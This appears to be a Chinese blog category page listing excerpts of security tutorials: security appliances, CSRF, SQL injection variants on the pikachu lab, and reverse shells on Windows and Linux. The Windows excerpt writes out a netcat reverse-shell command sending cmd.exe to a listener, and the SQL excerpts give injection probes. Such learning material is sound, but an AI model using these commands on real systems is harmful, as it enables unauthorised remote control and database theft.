网络安全
文章平均质量分 78
树火
菜就多学习!
展开
-
常见网络安全设备
一、防火墙定位:访问控制类产品,网络出现后的第一类安全产品。功能:隔离内网、外网以及DMZ区(业务系统对外发布区,Web应用服务器,邮件服务器等)并控制用户访问。部署方式:通常部署在网络边界或者重要系统边界。通常工作在网络层。二、IPS定位:访问控制类产品,入侵防御系统。功能:能够对流经设备的网络流量进行分析、监控,最重要的是发现攻击后,能够及时拦截阻断。它是防火墙的重要补充。如果说防火墙是第一道防御线,那么IPS就是第二道。部署方式:通常串接在网络主干链路上,或者重要业务系统边界,通常由防火原创 2021-06-03 10:23:09 · 8079 阅读 · 1 评论 -
CSRF漏洞
什么是CSRF?CSRF就是跨站请求伪造,由于其具有一次性,故也被称为:One Click Attack 或session Riding。攻击者利用目标用户的身份,以目标用户的身份执行某些非法操作。CSRF能够做什么?以目标用户的名义发送邮件,发消息,盗取用户账号,甚至购买商品,虚拟货币转账,这会泄露个人隐私并威胁到用户财产安全。CSRF形成条件(1)用户登录了网站,能够执行网站功能。(2)目标用户访问了攻击者构造的URL。(3)session或cookie有效。实例我们以pikachu靶原创 2021-05-25 20:26:41 · 153 阅读 · 0 评论 -
宽字节注入和报错注入
宽字节注入1.什么是宽字节当某字符的大小为一个字节时,称其字符为窄字节;当某字符的大小为两个字节时,称其字符为宽字节;所有英文默认占一个字节,汉字占两个字节。常见的宽字节编码:GB2312,GBK,GB18030,BIG5,Shift_JIS等等2.注入条件(1)数据库使用了gbk编码.(2)使用了过滤函数,将用户输入的单引号转义(mysql_real_escape_string,addslashes)这样被处理后的sql语句中,单引号不再具有‘作用’,仅仅是‘内容’而已,换句话说,这个单原创 2021-05-25 20:15:03 · 478 阅读 · 0 评论 -
Windows下反弹shell的方式
一、Windows下反弹shell1.nc反弹(1)我们先在被控制主机下载netcat。netcat下载(2)cmd下打开下载目录,输入:nc 192.168.59.131 9999 -e C:\Users\21124\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\cmd.exe(本机cmd文件路径)(3)可以看到shell是反弹回来的,但是可能由于防火墙的原因,控制极其不稳定。2.msf反弹(1)原创 2021-05-25 20:12:39 · 5236 阅读 · 1 评论 -
Linux下反弹shell的方式
一、什么是shell?shell是渗透中常用的名词,像getshell,webshell,反弹shell等等,都和shell相关。getshell:获取到目标的命令执行权限。webshell:指网站后门,通过web服务进行命令执行。反弹shell:把命令行的输入输出转移到其它主机。Shell 俗称壳(用来区别于核),是指“为使用者提供操作界面”的软件(命令解析器)。它类似于DOS下的command.com和后来的cmd.exe。它接收用户命令,然后调用相应的应用程序。简单说用户通过壳(shell)原创 2021-05-25 20:12:15 · 911 阅读 · 0 评论 -
SQL注入之盲注(boolean盲注和时间盲注)
一、boolen盲注boolen就是系统屏蔽返回错误信息,只返回是或不是,所以我们不能直观的得到数据库信息,在这里,我们就只能通过boolen盲注进行注入。我们依旧使用pikachu靶场进行测试,这里肯定是存在SQL注入的,就不再多作演示。我们先看一下为什么这里只能用boolen注入。我们在union和boolen注入处都输入:kobe' order by 3#可以看到,uhion注入是不屏蔽报错信息的,而boolen注入只显示你输入有误,屏蔽了报错信息。而只有当我们输入正确的时候,才会返原创 2021-05-12 10:27:19 · 720 阅读 · 0 评论 -
union注入之字符型注入和数值型注入
什么是SQL注入?SQL注入就是web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数带进数据库查询,攻击者可以通过构造不同的SQL语句实现对数据库的任意操作。字符型注入判断方法:当输入的参数类型为字符型时,数据库执行的查询语句为:select * from users where id=‘x’,我们可以使用’1’=‘1和’1’=‘2判断是否存在SQL注入。url 地址中输入 http://xxx/abc.php?id= x’ and ‘1’=‘1 页面运行正常,继原创 2021-05-12 10:26:48 · 680 阅读 · 0 评论